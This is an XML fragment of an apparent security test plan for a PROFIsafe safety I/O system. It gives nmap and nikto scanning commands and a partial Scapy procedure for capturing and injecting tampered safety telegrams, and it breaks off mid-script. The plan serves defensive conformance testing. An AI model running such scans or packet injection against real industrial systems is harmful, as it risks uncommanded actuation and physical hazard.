            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3C7CFE" w14:textId="6D2273B1" w:rsidR="00664BBB" w:rsidRPr="006D5B99"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on P3. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646E4340" w14:textId="7AD69E17" w:rsidR="00664BBB" w:rsidRPr="006D5B99" w:rsidRDefault="00695BB4" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>Nmap (ifm CM-001)</w:t>
            </w:r>
            <w:r w:rsidR="00997AEC" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>, Nikto (CM-007</w:t>
            </w:r>
            <w:r w:rsidR="00252155" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7918F4E4" w14:textId="0EE504F8" w:rsidR="0083520B" w:rsidRPr="006D5B99"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sudo nmap -sS -sV -p- -T3 </w:t>
            </w:r>
            <w:r w:rsidR="0064263A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">oA </w:t>
            </w:r>
            <w:r w:rsidR="00EB4CE8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> cm_rq001-02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidR="007444DA" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tcp_</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">srio </w:t>
            </w:r>
            <w:r w:rsidR="009857D2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$SRIO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D77B4CE" w14:textId="5AECAF14" w:rsidR="0083520B" w:rsidRPr="006D5B99"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sudo nmap -sU --top-ports 200 -oA </w:t>
            </w:r>
            <w:r w:rsidR="00EB4CE8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">cm_rq001-02 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_udp</w:t>
            </w:r>
            <w:r w:rsidR="007444DA" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_srio</w:t>
            </w:r>
            <w:r w:rsidR="009857D2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> $SRIO</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4377370B" w14:textId="1E1A3960" w:rsidR="000875F9" w:rsidRPr="006D5B99" w:rsidRDefault="0083520B" w:rsidP="0083520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nikto -h http://$SRIO  -o</w:t>
            </w:r>
            <w:r w:rsidR="00856D8D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>utput</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EB4CE8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">cm_rq001-02 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_srio.html -Format html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w:rsidRPr="006D5B99"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Pr="006D5B99" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FCE5A2" w14:textId="77777777" w:rsidR="00695BB4" w:rsidRPr="006D5B99" w:rsidRDefault="00695BB4" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D603FD2" w14:textId="62E74A6A" w:rsidR="00695BB4" w:rsidRPr="006D5B99" w:rsidRDefault="00695BB4" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3755BA" w14:textId="2271C871" w:rsidR="007422A7" w:rsidRPr="006D5B99" w:rsidRDefault="007422A7"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80/tcp open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="644351BC" w14:textId="4F904D4B" w:rsidR="00823E6C" w:rsidRPr="006D5B99" w:rsidRDefault="00B0145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Port 161/</w:t>
            </w:r>
            <w:r w:rsidR="001E7158" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>udp open</w:t>
            </w:r>
            <w:r w:rsidR="006C7047" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> snmp, </w:t>
            </w:r>
            <w:r w:rsidR="001E7158" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Port </w:t>
            </w:r>
            <w:r w:rsidR="006C7047" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>49152</w:t>
            </w:r>
            <w:r w:rsidR="001E7158" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/udp</w:t>
            </w:r>
            <w:r w:rsidR="006C7047" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> open/filtered unk</w:t>
            </w:r>
            <w:r w:rsidR="004B1FC6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A844B23" w14:textId="77777777" w:rsidR="00917785" w:rsidRPr="006D5B99" w:rsidRDefault="00977F3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HTMl</w:t>
            </w:r>
            <w:r w:rsidR="00700AF1" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-Nikto Report</w:t>
            </w:r>
            <w:r w:rsidR="00917785" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>?:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107D10A4" w14:textId="69147801" w:rsidR="00977F35" w:rsidRPr="006D5B99" w:rsidRDefault="00414DB5"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R</w:t>
            </w:r>
            <w:r w:rsidR="005A730A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>isk?</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00917785" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Spring Boot Actuator endpoint exposed (valid JSON response)</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">? </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06AF4003" w14:textId="7E3D4FBF" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C377A6D" w14:textId="516F8AA5" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ001-03 </w:t>
      </w:r>
      <w:r w:rsidR="00262A1D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007C42FA" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrity-Value Mismatch Rejection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47605813" w14:textId="306FF42B" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00262A1D"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0011963B"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7E495E7D" w14:textId="0F5265BE" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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 CR 3.6 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset A, Asset C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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3DA115EC" w14:textId="07E4D1C5"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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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64F44DCC" w14:textId="4E4BE01B"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470CE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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196E3A21" w14:textId="0B18FB94" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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 that a safety telegram whose consumer identity / integrity-check value does not match the legitimate parameters is rejected, resolving to the safe state rather than to an uncommanded output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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2BA07877" w14:textId="77777777" w:rsidR="00A342FC"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D5B99"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qualifier, output state, and diagnostics</w:t>
            </w:r>
            <w:r w:rsidR="006A2F66" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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34552B1B" w14:textId="33987E63" w:rsidR="00A342FC"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device rejects the crafted telegrams and either continues on legitimate traffic or passivates to the safe state (outputs de-</w:t>
            </w:r>
            <w:r w:rsidR="00F45D80" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>energized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, qualifier bad), with no uncommanded actuation. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCAE454" w14:textId="45F71E60" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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crafted telegram causes an uncommanded or hazardous output change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B3C3DDF" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRPr="006D5B99" w:rsidRDefault="00EC056D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C5914F" w14:textId="64AD7D10" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00EE3A78" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-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6D5B99"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6D5B99" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD62C39" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="006D5B99"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3A78" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D82B47" w14:textId="3490EFAE" w:rsidR="00EE3A78" w:rsidRPr="006D5B99"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TC-RQ001-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FEC006B" w14:textId="64050A3A" w:rsidR="00EE3A78" w:rsidRPr="006D5B99" w:rsidRDefault="007C1E8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NV2 (mirror ports 1+2 </w:t>
            </w:r>
            <w:r w:rsidR="0005537A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B91341" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3 on switch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3165D918" w14:textId="78E93509" w:rsidR="00EE3A78" w:rsidRPr="006D5B99" w:rsidRDefault="00482CBB" w:rsidP="000D76A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Wireshark/tshark, Scapy</w:t>
            </w:r>
            <w:r w:rsidR="00197B24" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal (Online &amp; Diagnostics).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00867718" w:rsidRPr="006D5B99"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867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="00867718">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D0CC89" w14:textId="3D2EBB79"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Step 0: on the switch web/CLI management interface, configure port mirroring </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DCA7AA7" w14:textId="775F7113" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="008B3645">
            <w:pPr>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6D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"># Source ports: 1 (PLC) + 2 (SRIO); Destination port: 3 (Kali). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B2A18F" w14:textId="77777777" w:rsidR="003377F7" w:rsidRPr="006D5B99" w:rsidRDefault="003377F7" w:rsidP="008B3645">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BD03880" w14:textId="2B5BFF8F"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Step 1: on the TIA laptop, establish the normal PROFIsafe connection </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A06EA8" w14:textId="32D3AE90" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="00F024BD">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&gt; 'Go online' &gt; Watch table with F-DI1/F-DI2/F-DO1/F-DO2 + Qualifier bits</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CEB472" w14:textId="77777777" w:rsidR="00CD4256" w:rsidRPr="006D5B99" w:rsidRDefault="00CD4256" w:rsidP="00F024BD">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FC22076" w14:textId="5FDC5CE0"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Step 2: on Kali, identify the dongle interface </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15642B42"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ip a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20EB3446" w14:textId="5270FC4F" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="001A43AF">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assume eth1 for the remaining commands</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F44A56C" w14:textId="77777777" w:rsidR="00CD4256" w:rsidRPr="006D5B99" w:rsidRDefault="00CD4256" w:rsidP="001A43AF">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7A411607" w14:textId="16A5ECF1"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Step 3: capture cyclic PROFINET/PROFIsafe traffic (EtherType 0x8892)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF6F804"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sudo tshark -i eth1 -f "ether proto 0x8892" -w cm_rq001-03_baseline.pcapng</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7B770B" w14:textId="2F1C4C40" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="0067697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let it run ~30s, then Ctrl+C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1C993D" w14:textId="77777777" w:rsidR="00CD4256" w:rsidRPr="006D5B99" w:rsidRDefault="00CD4256" w:rsidP="00676975">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4192C088" w14:textId="22D46E81"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Step 4: identify the SRIO's MAC address from the capture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768AAC96" w14:textId="32888B87" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="0067697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tshark -r cm_rq001-03_baseline.pcapng -T fields -e eth.src -e eth.dst | sort -u</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="410BE131" w14:textId="3ACA1AFD"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w:t>
            </w:r>
            <w:r w:rsidR="00676975" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Step 5: open the capture in Wireshark and note the byte offsets of the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FCAE173"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F_Dest_Add-related area and the 4-byte CRC field (per PROFIsafe frame layout,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4EA0DB" w14:textId="1037E1BA" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="00CD425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wireshark cm_rq001-03_baseline.pcapng &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C3B7B47" w14:textId="77777777" w:rsidR="00CD4256" w:rsidRPr="006D5B99" w:rsidRDefault="00CD4256" w:rsidP="00CD4256">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F7DE193" w14:textId="7276B28C"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Step 6: build the injection script cm_rq001-03_inject.py </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B43B385"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cat &gt; cm_rq001-03_inject.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F4ADD8A"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from scapy.all import Ether, Raw, sendp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7621EA5F"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iface = "eth1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E292671"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target_mac = "</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AA:BB:CC:DD:EE:FF</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"   # &lt;- replace with the SRIO MAC found in Step 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BB46E21"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3F1C0DB"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(a) mis-addressed telegram: copy a real captured payload and flip a byte in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C80555E"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the F_Dest_Add-related region identified in Step 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4257DFC0"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bad_addr_payload = bytes.fromhex("</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REPLACE_WITH_MODIFIED_HEX_PAYLOAD</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402F921B"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sendp(Ether(dst=target_mac, type=0x8892)/Raw(load=bad_addr_payload),</w:t>
            </w:r>
          </w:p>
